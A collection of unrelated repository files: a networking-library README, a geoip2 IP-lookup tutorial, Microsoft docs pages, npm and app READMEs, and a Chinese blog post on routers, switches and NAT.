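# One iteration of the event loop: poll for ready fds, dispatch callbacks.
for key, _events in sel.select(timeout=1):
    key.data(key.fileobj)  # invoke the handler registered for this fd

print(received)  # [b'hello']

sel.unregister(server_side)
server_side.close()
client_side.close()
```

In chtho, `Channel` plays the role of the (fd, events, callback) registration, `Poller`/`EPoll` play the role of `sel.select`, and `EventLoop` runs the dispatch loop forever on its own thread.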
development history: logger/logstream -> threading -> time/timer -> eventloop/thread/threadpool/poller/channel -> buffer/tcpconnection/acceptor/tcpserver -> connector/tcpclient -> logfile/asynclogging -> ???
## Documentation
* [logging](./docs/logging.md)
* [timer](./docs/TimerQueue.md)
* [channel](./docs/Channel.md)
* [eventloop](./docs/EventLoop.md)
* [poller](./docs/Poller.md)
* [RAII](./docs/RAII.md)
* [smartptr](./docs/smartpointers.md)
## TODO
- [ ] HTTP server
- [ ] protobuf
- [ ] protorpc
## License
MIT License
## Acknowledgement
This project learns _massively_ from [muduo](https://github.com/chenshuo/muduo).

---

**Source:** `_posts/2020-07-20-get-ip-info.md` from `waittim/zekun.github.io` (MIT license)

---
layout: post
title: How to get information from IP address?
subtitle: Note - geoip2 module introduction
date: 2020-07-20
author: Zekun
header-img: img/post-python.jpg
catalog: true
tags:
- Feature Engineering
- Python
- IP
---
The process of getting IP address information is based on the [GeoIP2 Databases](https://www.maxmind.com/en/geoip2-databases). I used the [MaxMind GeoIP2 Python API](https://geoip2.readthedocs.io/en/latest/) for IP information queries. The GitHub page for the API is [GeoIP2-python](https://github.com/maxmind/GeoIP2-python).

You need to download [GeoLite2-City.mmdb](https://github.com/waittim/waittim.github.io/raw/master/gallery/GeoLite2-City.mmdb) as the data source and install the **geoip2** module before you can use it.
For complete information, see [MaxMind - GeoIP2 Downloadable Databases](https://dev.maxmind.com/geoip/geoip2/downloadable/).
### Installation
```python
!pip install geoip2
# For Chinese user, you can choose tsinghua mirrors
#!pip install -i https://pypi.tuna.tsinghua.edu.cn/simple geoip2
```
### Usage
First, we should import the geoip2 module. Since we are using the free downloadable database, we import *geoip2.database*.
```python
import geoip2.database
```
```python
ip = '129.59.93.0' # The IP of Vanderbilt University
reader = geoip2.database.Reader('GeoLite2-City.mmdb')
response = reader.city(ip)
reader.close()
```
All of the results are stored in the *response* object.
```python
response
```
```python
geoip2.models.City({'city': {'geoname_id': 4644585, 'names': {'de': 'Nashville', 'en': 'Nashville', 'es': 'Nashville', 'fr': 'Nashville', 'ja': 'ナッシュビル', 'pt-BR': 'Nashville', 'ru': 'Нашвилл', 'zh-CN': '纳什维尔'}}, 'continent': {'code': 'NA', 'geoname_id': 6255149, 'names': {'de': 'Nordamerika', 'en': 'North America', 'es': 'Norteamérica', 'fr': 'Amérique du Nord', 'ja': '北アメリカ', 'pt-BR': 'América do Norte', 'ru': 'Северная Америка', 'zh-CN': '北美洲'}}, 'country': {'geoname_id': 6252001, 'iso_code': 'US', 'names': {'de': 'USA', 'en': 'United States', 'es': 'Estados Unidos', 'fr': 'États-Unis', 'ja': 'アメリカ合衆国', 'pt-BR': 'Estados Unidos', 'ru': 'США', 'zh-CN': '美国'}}, 'location': {'accuracy_radius': 20, 'latitude': 36.066, 'longitude': -86.9659, 'metro_code': 659, 'time_zone': 'America/Chicago'}, 'postal': {'code': '37221'}, 'registered_country': {'geoname_id': 6252001, 'iso_code': 'US', 'names': {'de': 'USA', 'en': 'United States', 'es': 'Estados Unidos', 'fr': 'États-Unis', 'ja': 'アメリカ合衆国', 'pt-BR': 'Estados Unidos', 'ru': 'США', 'zh-CN': '美国'}}, 'subdivisions': [{'geoname_id': 4662168, 'iso_code': 'TN', 'names': {'en': 'Tennessee', 'es': 'Tennessee', 'fr': 'Tennessee', 'ja': 'テネシー州', 'pt-BR': 'Tenessi', 'ru': 'Теннесси', 'zh-CN': '田纳西州'}}], 'traits': {'ip_address': '129.59.93.0', 'prefix_len': 20}}, ['en'])
```
Let me re-format it to make it understandable.
```python
{'city':
{'geoname_id': 4644585,
'names': {'de': 'Nashville', 'en': 'Nashville', 'es': 'Nashville', 'fr': 'Nashville', 'ja': 'ナッシュビル', 'pt-BR': 'Nashville', 'ru': 'Нашвилл', 'zh-CN': '纳什维尔'}
},
'continent':
{'code': 'NA',
'geoname_id': 6255149,
'names': {'de': 'Nordamerika', 'en': 'North America', 'es': 'Norteamérica', 'fr': 'Amérique du Nord', 'ja': '北アメリカ', 'pt-BR': 'América do Norte', 'ru': 'Северная Америка', 'zh-CN': '北美洲'}
},
'country':
{'geoname_id': 6252001,
'iso_code': 'US',
'names': {'de': 'USA', 'en': 'United States', 'es': 'Estados Unidos', 'fr': 'États-Unis', 'ja': 'アメリカ合衆国', 'pt-BR': 'Estados Unidos', 'ru': 'США', 'zh-CN': '美国'}
},
'location':
{'accuracy_radius': 20,
'latitude': 36.066,
'longitude': -86.9659,
'metro_code': 659,
'time_zone': 'America/Chicago'
},
'postal':
{'code': '37221'},
'registered_country':
{'geoname_id': 6252001,
'iso_code': 'US',
'names': {'de': 'USA', 'en': 'United States', 'es': 'Estados Unidos', 'fr': 'États-Unis', 'ja': 'アメリカ合衆国', 'pt-BR': 'Estados Unidos', 'ru': 'США', 'zh-CN': '美国'}
},
'subdivisions':
[{'geoname_id': 4662168,
'iso_code': 'TN',
'names': {'en': 'Tennessee', 'es': 'Tennessee', 'fr': 'Tennessee', 'ja': 'テネシー州', 'pt-BR': 'Tenessi', 'ru': 'Теннесси', 'zh-CN': '田纳西州'}
}],
'traits': {'ip_address': '129.59.93.0', 'prefix_len': 20}
},
['en']
```
Here are some examples of using the *response* object:
```python
response.country.iso_code
#'US'
```
```python
response.country.name
#'United States'
```
```python
response.country.names['zh-CN']
#'美国'
```
```python
response.subdivisions.most_specific.name
#'Tennessee'
```
```python
response.subdivisions.most_specific.iso_code
#'TN'
```
```python
response.city.name
#'Nashville'
```
```python
response.postal.code
#'37221'
```
```python
response.location.latitude
#36.066
```
```python
response.location.longitude
#-86.9659
```
```python
response.traits.network
#IPv4Network('129.59.80.0/20')
```
With this method, you can convert IP address information into an actual address or latitude and longitude information, etc., for exploratory data analysis or modeling.

---

**Source:** `docs/framework/winforms/controls/how-to-change-the-appearance-of-the-windows-forms-tabcontrol.md` from `olifantix/docs.de-de` (CC-BY-4.0 and MIT licenses)

---
title: 'How to: Change the appearance of the Windows Forms TabControl'
ms.date: 03/30/2017
dev_langs:
- csharp
- vb
- cpp
helpviewer_keywords:
- icons [Windows Forms], displaying on tabs
- TabControl control [Windows Forms], changing page appearance
- tabs [Windows Forms], controlling appearance
- buttons [Windows Forms], displaying tabs as
ms.assetid: 7c6cc443-ed62-4d26-b94d-b8913b44f773
ms.openlocfilehash: 1ea2208229d790f69e517d55e2de5ee042bdfb03
ms.sourcegitcommit: 3d5d33f384eeba41b2dff79d096f47ccc8d8f03d
ms.translationtype: MT
ms.contentlocale: de-DE
ms.lasthandoff: 05/04/2018
---
# <a name="how-to-change-the-appearance-of-the-windows-forms-tabcontrol"></a>How to: Change the appearance of the Windows Forms TabControl
You can change the appearance of tabs in Windows Forms by using properties of the <xref:System.Windows.Forms.TabControl> and the <xref:System.Windows.Forms.TabPage> objects that make up the individual tabs of the control. By setting these properties, you can display images on tabs, display tabs vertically instead of horizontally, display multiple rows of tabs, and enable or disable tabs programmatically.
### <a name="to-display-an-icon-on-the-label-part-of-a-tab"></a>To display an icon on the label part of a tab
1. Add an <xref:System.Windows.Forms.ImageList> control to the form.
2. Add images to the image list.
For more information about image lists, see [ImageList Component](../../../../docs/framework/winforms/controls/imagelist-component-windows-forms.md) and [How to: Add or Remove Images with the Windows Forms ImageList Component](../../../../docs/framework/winforms/controls/how-to-add-or-remove-images-with-the-windows-forms-imagelist-component.md).
3. Set the <xref:System.Windows.Forms.TabControl.ImageList%2A> property of the <xref:System.Windows.Forms.TabControl> to the <xref:System.Windows.Forms.ImageList> control.
4. Set the <xref:System.Windows.Forms.TabPage.ImageIndex%2A> property of the <xref:System.Windows.Forms.TabPage> to the index of the appropriate image in the list.
### <a name="to-create-multiple-rows-of-tabs"></a>To create multiple rows of tabs
1. Add the number of tabs you want.
2. Set the <xref:System.Windows.Forms.TabControl.Multiline%2A> property of the <xref:System.Windows.Forms.TabControl> to `true`.
3. If the tabs are not already displayed in multiple rows, set the <xref:System.Windows.Forms.Control.Width%2A> property of the <xref:System.Windows.Forms.TabControl> to be narrower than all the tabs combined.
### <a name="to-arrange-tabs-on-the-side-of-the-control"></a>To arrange tabs on the side of the control
- Set the <xref:System.Windows.Forms.TabControl.Alignment%2A> property of the <xref:System.Windows.Forms.TabControl> to <xref:System.Windows.Forms.TabAlignment.Left> or <xref:System.Windows.Forms.TabAlignment.Right>.
### <a name="to-programmatically-enable-or-disable-all-controls-on-a-tab"></a>To programmatically enable or disable all controls on a tab
1. Set the <xref:System.Windows.Forms.TabPage.Enabled%2A> property of the <xref:System.Windows.Forms.TabPage> to `true` or `false`.
```vb
TabPage1.Enabled = False
```
```csharp
tabPage1.Enabled = false;
```
```cpp
tabPage1->Enabled = false;
```
### <a name="to-display-tabs-as-buttons"></a>To display tabs as buttons
- Set the <xref:System.Windows.Forms.TabControl.Appearance%2A> property of the <xref:System.Windows.Forms.TabControl> to <xref:System.Windows.Forms.TabAppearance.Buttons> or <xref:System.Windows.Forms.TabAppearance.FlatButtons>.
## <a name="see-also"></a>See also
[TabControl Control](../../../../docs/framework/winforms/controls/tabcontrol-control-windows-forms.md)
[TabControl Control Overview](../../../../docs/framework/winforms/controls/tabcontrol-control-overview-windows-forms.md)
[How to: Add a Control to a Tab Page](../../../../docs/framework/winforms/controls/how-to-add-a-control-to-a-tab-page.md)
[How to: Disable Tab Pages](../../../../docs/framework/winforms/controls/how-to-disable-tab-pages.md)
[How to: Add and Remove Tabs with the Windows Forms TabControl](../../../../docs/framework/winforms/controls/how-to-add-and-remove-tabs-with-the-windows-forms-tabcontrol.md)

---

**Source:** `README.md` from `npmdoc/node-npmdoc-watchify` (MIT license)

# npmdoc-watchify
#### api documentation for [watchify (v3.9.0)](https://github.com/substack/watchify) [](https://www.npmjs.org/package/npmdoc-watchify) [](https://travis-ci.org/npmdoc/node-npmdoc-watchify)
#### watch mode for browserify builds
[](https://www.npmjs.com/package/watchify)
- [https://npmdoc.github.io/node-npmdoc-watchify/build/apidoc.html](https://npmdoc.github.io/node-npmdoc-watchify/build/apidoc.html)
[](https://npmdoc.github.io/node-npmdoc-watchify/build/apidoc.html)


# package.json
```json
{
"name": "watchify",
"version": "3.9.0",
"description": "watch mode for browserify builds",
"main": "index.js",
"bin": "bin/cmd.js",
"dependencies": {
"anymatch": "^1.3.0",
"browserify": "^14.0.0",
"chokidar": "^1.0.0",
"defined": "^1.0.0",
"outpipe": "^1.1.0",
"through2": "^2.0.0",
"xtend": "^4.0.0"
},
"devDependencies": {
"brfs": "^1.0.1",
"mkdirp": "~0.5.1",
"split": "^1.0.0",
"tape": "^4.2.2",
"uglify-js": "^2.5.0",
"win-spawn": "^2.0.0"
},
"scripts": {
"test": "tape test/*.js"
},
"repository": {
"type": "git",
"url": "git://github.com/substack/watchify.git"
},
"homepage": "https://github.com/substack/watchify",
"keywords": [
"browserify",
"browserify-tool",
"watch",
"bundle",
"build",
"browser"
],
"author": {
"name": "James Halliday",
"url": "http://substack.net"
},
"license": "MIT"
}
```
# misc
- this document was created with [utility2](https://github.com/kaizhu256/node-utility2)

---

**Source:** `README.md` from `kurikei/github-app-sandbox` (MIT license)

# Code Climate
[](https://codeclimate.com/github/kurikei/github-app-sandbox/maintainability)
[](https://codeclimate.com/github/kurikei/github-app-sandbox/test_coverage)
# shields.io



# waffle.io
[](https://waffle.io/kurikei/github-app-sandbox/metrics/throughput)
[](https://waffle.io/kurikei/github-app-sandbox)

---

**Source:** `docs/debugger/debug-interface-access/idiasectioncontrib-get-code16bit.md` from `tommorris/visualstudio-docs.cs-cz` (CC-BY-4.0 and MIT licenses)

---
title: Idiasectioncontrib::get_code16bit – | Microsoft Docs
ms.custom: ''
ms.date: 11/04/2016
ms.technology: vs-ide-debug
ms.topic: conceptual
dev_langs:
- C++
helpviewer_keywords:
- IDiaSectionContrib::get_code16bit method
ms.assetid: 8cde8fc5-9546-4f82-b4a8-afd0d835039e
author: mikejo5000
ms.author: mikejo
manager: douge
ms.workload:
- multiple
ms.openlocfilehash: e253b440712a26b67870f76b241a85f5979158b3
ms.sourcegitcommit: 3d10b93eb5b326639f3e5c19b9e6a8d1ba078de1
ms.translationtype: MT
ms.contentlocale: cs-CZ
ms.lasthandoff: 04/18/2018
ms.locfileid: "31467141"
---
# <a name="idiasectioncontribgetcode16bit"></a>IDiaSectionContrib::get_code16bit
Gets a flag that indicates whether the section contains 16-bit code.
## <a name="syntax"></a>Syntax
```C++
HRESULT get_code16bit(
BOOL *pRetVal
);
```
#### <a name="parameters"></a>Parameters
`pRetVal`
[out] Returns `TRUE` if the code in the section is 16-bit; otherwise, returns `FALSE`.
## <a name="return-value"></a>Return Value
If successful, returns `S_OK`; otherwise, returns an error code.
## <a name="remarks"></a>Remarks
This method indicates only whether the code is 16-bit. If the code is not 16-bit, it could be anything else, such as 32-bit or 64-bit code.
## <a name="see-also"></a>See Also
[IDiaSectionContrib](../../debugger/debug-interface-access/idiasectioncontrib.md)
9a5c505e93e6137492a1062978ef08c1528c142e | 2,381 | md | Markdown | README.md | vedraj360/V-Crypt_Password_Manager | 99cf439b99479edd6ba48b9de96a9596cccbfe86 | [
"MIT"
] | 1 | 2020-11-30T11:37:17.000Z | 2020-11-30T11:37:17.000Z | README.md | vedraj360/V-Crypt_Password_Manager | 99cf439b99479edd6ba48b9de96a9596cccbfe86 | [
"MIT"
] | null | null | null | README.md | vedraj360/V-Crypt_Password_Manager | 99cf439b99479edd6ba48b9de96a9596cccbfe86 | [
"MIT"
] | null | null | null | # V-Crypt Password Manager 🔑✔❤
Super secure password manager that stores passwords with AES-256-bit encryption, using AWS as the backend for storing data and endpoints built with API Gateway.
Currently I am using this as my password manager, and it is in closed beta on Google Play. If you have suggestions, mail me at vedraj.developer@gmail.com; contributions are always welcome.
## Screenshots
## Splash Screen
<p float="left">
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Dark/Splash-D.png" width="300" hspace="40"/>
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Light/splash-L.png" width="300" hspace="60"/>
</p>
## Login / Signup
<p float="left">
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Dark/Login-D.png" width="300" hspace="40"/>
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Light/Login-L.png" width="300" hspace="40"/>
</p>
## Vault
<p float="left">
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Dark/Vault-D.png" width="300" hspace="40"/>
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Light/Vault-L.png" width="300" hspace="40"/>
</p>
## Add Password
<p float="left">
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Dark/ADP-D.png" width="300" hspace="40"/>
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Light/ADP-L.png" width="300" hspace="40"/>
</p>
## Update Password
<p float="left">
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Dark/UPD-D.png" width="300" hspace="40"/>
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Light/UPD-L.png" width="300" hspace="40"/>
</p>
## Password Length
<p float="left">
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Dark/PS-D.png" width="300" hspace="40"/>
<img src="https://raw.githubusercontent.com/vedraj360/V-Crypt_Password_Manager/main/screenshots/Light/PS-L.png" width="300" hspace="40"/>
</p>
| 46.686275 | 192 | 0.745065 | kor_Hang | 0.178059 |
9a5c6e28667a0226ac25002417ce5b92b2f697f1 | 1,296 | md | Markdown | README.md | adijha/Node_Blog_App | b4acae6c27085d90662b713d58da6cac9010c850 | [
"MIT"
] | 1 | 2019-06-19T02:44:48.000Z | 2019-06-19T02:44:48.000Z | README.md | AdityaKumarJha/Node_Blog_App | b4acae6c27085d90662b713d58da6cac9010c850 | [
"MIT"
] | 1 | 2019-06-19T02:45:37.000Z | 2019-06-23T01:55:19.000Z | README.md | AdityaKumarJha/Bootstrap_Theme_Blog_App | b4acae6c27085d90662b713d58da6cac9010c850 | [
"MIT"
] | null | null | null | # A node js blog app
[](https://mrjha.online/projects/node_blog)
An open-source template for a blog built on Node.js :)
You can read about [this blog on my website][mrjha], as well as in the following article:
[How to make a blog web app on Node.js][omniworld]
## If You Are Submitting Bugs or Issues
Verify that you are running a _stable_ version of Node and npm.
If you are on a stable version of Node, please provide sufficient code to reproduce the issue.
## Version Compatibility
Works with all stable versions of Node and npm.
## Dependencies
* NodeJS
* express
* mongo-connect
* mongodb
* express-session
* nodemon (good to have)
* bcrypt.js
* body parser
* mongoose
* express file-upload
#### Expected Updates
Here we are not using any front-end framework,
so I am planning to use React.js.
### ENV
Create a `.env` file for storing confidential data, such as API keys or your mongoURI.
## Testing
If you create a pull request :)
```
npm install
npm test
```
## Contributors
* [Samrat Saurav Jaiswal][samrat]
## License
The license is stated in the LICENSE file.
[mrjha]:https://mrjha.online
[AdityaKumarJha]:https://github.com/AdityaKumarJha
[Samrat]:https://github.com/samratsauravjaiswal
[omniworld]:https://omniworld.com/node_blog
| 19.938462 | 89 | 0.740741 | eng_Latn | 0.909353 |
9a5c992ef76a502e2b16436388b30a4132e5cf76 | 3,066 | md | Markdown | _posts/2017-10-21-Router-Switch.md | WhataNerb/WhataNerb.github.io | 7a75aa35c05b74b6babbd02118033f9434e76d67 | [
"MIT"
] | null | null | null | _posts/2017-10-21-Router-Switch.md | WhataNerb/WhataNerb.github.io | 7a75aa35c05b74b6babbd02118033f9434e76d67 | [
"MIT"
] | null | null | null | _posts/2017-10-21-Router-Switch.md | WhataNerb/WhataNerb.github.io | 7a75aa35c05b74b6babbd02118033f9434e76d67 | [
"MIT"
] | null | null | null | ---
layout: post
title: '路由器与交换机的区别与联系'
date: 2017-10-21
categories: 网络
tags: 网络
---
Many people learning networking are puzzled by the differences and connections between routers and switches, because the two devices seem to do the same thing. In fact, they are quite different. Below is my understanding of the topic; I hope it helps!
### **Where do they work?**
In the OSI network model, from bottom to top, a **router works at layer 3 (the network layer)**, while the *switch* we usually talk about **works at layer 2 (the data link layer)**. (There are also more advanced layer-3 switches, layer-4 switches, and even layer-7 switches.)

<br>
### **How do they work?**
Their main jobs are as follows:
**Router: addressing and forwarding (based on IP addresses)**
**Switch: filtering and forwarding (based on MAC addresses)**
As you can see, both devices mainly forward data, but they rely on different kinds of addresses. That is the fundamental difference!
A router holds a **routing table** containing its addressing information (like a map). When it receives a **datagram** at the network layer, it forwards the datagram to the next hop (which might be another router, a switch, or the destination host) according to the routing table and its route-selection algorithm.
A switch holds a **MAC table** that records the MAC addresses of all devices connected to it. When it receives a **frame**, it looks up the destination MAC address from the frame header in its own table: if there is an entry, it forwards the frame; if not, it discards it.
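A toy model of that lookup, sketched in Python (the MAC addresses and port numbers are invented for the example; note that a real switch would flood an unknown unicast frame out all other ports rather than simply drop it):

```python
# A MAC table maps a destination MAC address to the switch port
# where that device was last seen.
mac_table = {
    "aa:aa:aa:aa:aa:01": 1,   # device on port 1
    "aa:aa:aa:aa:aa:02": 2,   # device on port 2
}

def forward(dst_mac):
    """Decide what to do with a frame based on its destination MAC."""
    port = mac_table.get(dst_mac)
    return f"forward out port {port}" if port is not None else "no entry"

print(forward("aa:aa:aa:aa:aa:02"))  # forward out port 2
print(forward("bb:bb:bb:bb:bb:99"))  # no entry
```

In practice a switch also *learns* the table by recording the source MAC and ingress port of every frame it receives.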
Let's look at an example network topology:

From the topology diagram, we should see that:
**Each router, together with the devices connected beneath it, forms a local area network (LAN).**
Switches work below routers, which means **switches operate inside the LAN**.
Switches handle **data forwarding inside the LAN**.
Routers **connect the LAN to the outside network**.
An analogy:
Each of us is a host, the courier is the router, the dorm supervisor is the switch, and the school is a LAN.
The courier delivers the package to the school based on the school address (IP), then hands it to the supervisor of the right building based on the building number (subnet IP), and the supervisor gives it to you based on your name (MAC).
<br>
### **Could we do without one of them?**
A switch works inside a LAN and forwards data based on MAC addresses. Without a router doing network-layer addressing, our data could never reach terminals on other networks.
A router has switching functionality built in, so hosts connected directly to a router can also exchange data, but with two drawbacks:
It offers fewer expandable ports than a switch.
A switch usually forwards in hardware, while a router mainly does addressing in software, which is slower.
<br>
### **How data is actually forwarded across the network**
> Reference: WeChat public account 码农翻身 ("Coder Turnaround"), by Liu Xin
Walking through an actual data-forwarding process makes the difference between routers and switches much clearer.
Suppose you visit www.baidu.com from your computer.
The process goes roughly as follows:

Your computer first builds an HTTP message at the application layer, wraps it into a TCP segment at the transport layer, then into an IP datagram at the network layer using the IP address resolved via DNS, and finally into an Ethernet frame at the link layer, which it sends to your switch:

Your switch receives it, rewraps the frame, and sends it on to your router:

Your router uses NAT (Network Address Translation) to translate your host's private LAN IP into a public IP, also rewriting the port number so your host is completely hidden from the outside, and then picks a suitable path from its routing table to forward the packet:
*(Thanks to @yc2503 for the correction.)*

At each subsequent hop, only the MAC address changes as the packet travels on toward its destination.
### About NAT:
NAT is a network-masquerading technique that hides the internal network by establishing mappings between IP addresses.
Its main functions are:
- Improving the security of the internal network
- Sharing network addresses, reducing address consumption
NAT is implemented in three main ways:
- Static NAT (Basic NAT): the most basic form of address translation; it translates only IP addresses, building a one-to-one mapping with no port translation.
- Network Address Port Translation (NAPT): supports port mapping and allows multiple hosts to share a single public IP address.
- Port Address Translation (PAT): rewrites the source port of outgoing packets, performing port translation; this is port multiplexing.
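A minimal sketch of the NAPT idea in Python (all addresses below are invented): each (private IP, private port) pair gets its own public port on the shared public address, which is what lets many hosts share one IP:

```python
# Toy NAPT translation table. Outgoing packets are rewritten to
# (PUBLIC_IP, unique public port); incoming replies are mapped back.
PUBLIC_IP = "203.0.113.7"

class Napt:
    def __init__(self):
        self.next_port = 40000
        self.out = {}      # (priv_ip, priv_port) -> public_port
        self.back = {}     # public_port -> (priv_ip, priv_port)

    def translate_out(self, priv_ip, priv_port):
        """Rewrite an outgoing (ip, port) pair to the shared public address."""
        key = (priv_ip, priv_port)
        if key not in self.out:
            self.out[key] = self.next_port
            self.back[self.next_port] = key
            self.next_port += 1
        return PUBLIC_IP, self.out[key]

    def translate_in(self, public_port):
        """Map a reply arriving on a public port back to the private host."""
        return self.back[public_port]

nat = Napt()
print(nat.translate_out("192.168.1.10", 5000))   # ('203.0.113.7', 40000)
print(nat.translate_out("192.168.1.11", 5000))   # ('203.0.113.7', 40001)
print(nat.translate_in(40001))                   # ('192.168.1.11', 5000)
```

Two hosts using the same private source port still get distinct public ports, so replies are unambiguous.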
> 1.[百度百科](https://baike.baidu.com/item/nat/320024)
> 2.[维基百科](https://zh.wikipedia.org/wiki/%E7%BD%91%E7%BB%9C%E5%9C%B0%E5%9D%80%E8%BD%AC%E6%8D%A2)
| 36.5 | 207 | 0.812785 | yue_Hant | 0.458543 |
9a5cbf993cf6c02cfbceaae273d03be71156f7fb | 876 | md | Markdown | docs/extensibility/debugger/reference/idebugfield-equal.md | Dragollla16/visualstudio-docs | 53fc727cc744ddd3f4baeb36085deac7d8db7b94 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/extensibility/debugger/reference/idebugfield-equal.md | Dragollla16/visualstudio-docs | 53fc727cc744ddd3f4baeb36085deac7d8db7b94 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/extensibility/debugger/reference/idebugfield-equal.md | Dragollla16/visualstudio-docs | 53fc727cc744ddd3f4baeb36085deac7d8db7b94 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: "IDebugField::Equal | Microsoft Docs"
ms.date: "11/04/2016"
ms.topic: "conceptual"
f1_keywords:
- "IDebugField::Equal"
helpviewer_keywords:
- "IDebugField::Equal method"
ms.assetid: 75369fe6-ddd3-497d-80d1-2488e6100e9f
author: "gregvanl"
ms.author: "gregvanl"
manager: jillfra
ms.workload:
- "vssdk"
---
# IDebugField::Equal
This method compares this field with the specified field for equality.
## Syntax
```cpp
HRESULT Equal(
IDebugField* pField
);
```
```csharp
int Equal(
IDebugField pField
);
```
#### Parameters
`pField`
[in] The field to compare to this one.
## Return Value
 If the fields are the same, returns `S_OK`. If the fields are different, returns `S_FALSE`. Otherwise, returns an error code.
## See Also
[IDebugField](../../../extensibility/debugger/reference/idebugfield.md) | 21.365854 | 128 | 0.672374 | eng_Latn | 0.621283 |
9a5d42a390b2acb227d06ef9ac73eb0f813dbcfb | 4,010 | md | Markdown | docs/standard/threading/threading-objects-and-features.md | CodeTherapist/docs.de-de | 45ed8badf2e25fb9abdf28c20e421f8da4094dd1 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/standard/threading/threading-objects-and-features.md | CodeTherapist/docs.de-de | 45ed8badf2e25fb9abdf28c20e421f8da4094dd1 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/standard/threading/threading-objects-and-features.md | CodeTherapist/docs.de-de | 45ed8badf2e25fb9abdf28c20e421f8da4094dd1 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Threadingobjekte und -funktionen
ms.date: 10/01/2018
ms.technology: dotnet-standard
helpviewer_keywords:
- threading [.NET Framework], features
- managed threading
ms.assetid: 239b2e8d-581b-4ca3-992b-0e8525b9321c
author: rpetrusha
ms.author: ronpet
ms.openlocfilehash: 1ba47ece16c74555b58780733e14de9833718c33
ms.sourcegitcommit: 8c28ab17c26bf08abbd004cc37651985c68841b8
ms.translationtype: HT
ms.contentlocale: de-DE
ms.lasthandoff: 10/08/2018
ms.locfileid: "48873306"
---
# <a name="threading-objects-and-features"></a>Threading objects and features
 Along with the <xref:System.Threading.Thread?displayProperty=nameWithType> class, .NET provides a number of classes that help you develop multithreaded applications. The following articles provide an overview of those classes:
|Title|Description|
|-----------|-----------------|
|[The managed thread pool](the-managed-thread-pool.md)|Describes the <xref:System.Threading.ThreadPool?displayProperty=nameWithType> class, which provides a pool of worker threads that are managed by .NET.|
|[Timers](timers.md)|Describes .NET timers that can be used in a multithreaded environment.|
|[Overview of synchronization primitives](overview-of-synchronization-primitives.md)|Describes types that can be used to synchronize access to a shared resource or to control thread interaction.|
|[EventWaitHandle, AutoResetEvent, CountdownEvent, ManualResetEvent](eventwaithandle-autoresetevent-countdownevent-manualresetevent.md)|Describes managed event wait handles, which signal and wait for signals and are used to synchronize thread activities.|
|[Mutexes](mutexes.md)|Describes the <xref:System.Threading.Mutex?displayProperty=nameWithType> class, which grants exclusive access to a shared resource.|
|[Interlocked operations](interlocked-operations.md)|Describes the <xref:System.Threading.Interlocked?displayProperty=nameWithType> class, which provides atomic operations for variables that are shared by multiple threads.|
|[Reader-writer locks](reader-writer-locks.md)|Describes the <xref:System.Threading.ReaderWriterLockSlim?displayProperty=nameWithType> class, which provides single-writer/multiple-reader access to a shared resource.|
|[Semaphore and SemaphoreSlim](semaphore-and-semaphoreslim.md)|Describes the <xref:System.Threading.Semaphore?displayProperty=nameWithType> class, which limits the number of threads that can access a shared resource or a pool of resources concurrently.|
|[Barrier](barrier.md)|Describes the <xref:System.Threading.Barrier?displayProperty=nameWithType> class, which implements the barrier pattern for coordinating threads in phased operations.|
|[SpinLock](spinlock.md)|Describes the <xref:System.Threading.SpinLock?displayProperty=nameWithType> structure, which is a lightweight alternative to the <xref:System.Threading.Monitor?displayProperty=nameWithType> class for certain low-level locking scenarios.|
|[SpinWait](spinwait.md)|Describes the <xref:System.Threading.SpinWait?displayProperty=nameWithType> structure, which provides support for spin-based waiting.|
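As a quick taste of the semaphore entry above (sketched in Python for brevity rather than .NET's `System.Threading.Semaphore`), at most `limit` threads can hold the semaphore at once:

```python
import threading
import time

limit = 3
sem = threading.Semaphore(limit)
active = 0   # workers currently inside the semaphore
peak = 0     # highest concurrency observed
lock = threading.Lock()

def worker():
    global active, peak
    with sem:                      # blocks when `limit` workers are inside
        with lock:
            active += 1
            peak = max(peak, active)
        time.sleep(0.01)           # hold the slot briefly
        with lock:
            active -= 1

threads = [threading.Thread(target=worker) for _ in range(10)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(peak <= limit)  # True: concurrency never exceeded the limit
```

The same bounded-concurrency pattern is what the .NET classes in the table provide, with `SemaphoreSlim` being the lighter-weight in-process variant.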
## <a name="see-also"></a>See also
- <xref:System.Threading.Monitor?displayProperty=nameWithType>
- <xref:System.Threading.WaitHandle?displayProperty=nameWithType>
- <xref:System.ComponentModel.BackgroundWorker?displayProperty=nameWithType>
- <xref:System.Threading.Tasks.Parallel?displayProperty=nameWithType>
- <xref:System.Threading.Tasks.Task?displayProperty=nameWithType>
- [Using threads and threading](using-threads-and-threading.md)
- [Asynchronous File I/O](../io/asynchronous-file-i-o.md)
- [Parallel programming](../parallel-programming/index.md)
- [Task Parallel Library (TPL)](../parallel-programming/task-parallel-library-tpl.md)
| 85.319149 | 317 | 0.822943 | deu_Latn | 0.908337 |
9a5d8887bb0f45defc79eb39bd3c3b1ac482127a | 52 | md | Markdown | README.md | Hellcats666/Juneauempire2020.gov- | 04e514c6237ee75921a2d2a4c9f2ec9fba215e09 | [
"MIT"
] | null | null | null | README.md | Hellcats666/Juneauempire2020.gov- | 04e514c6237ee75921a2d2a4c9f2ec9fba215e09 | [
"MIT"
] | null | null | null | README.md | Hellcats666/Juneauempire2020.gov- | 04e514c6237ee75921a2d2a4c9f2ec9fba215e09 | [
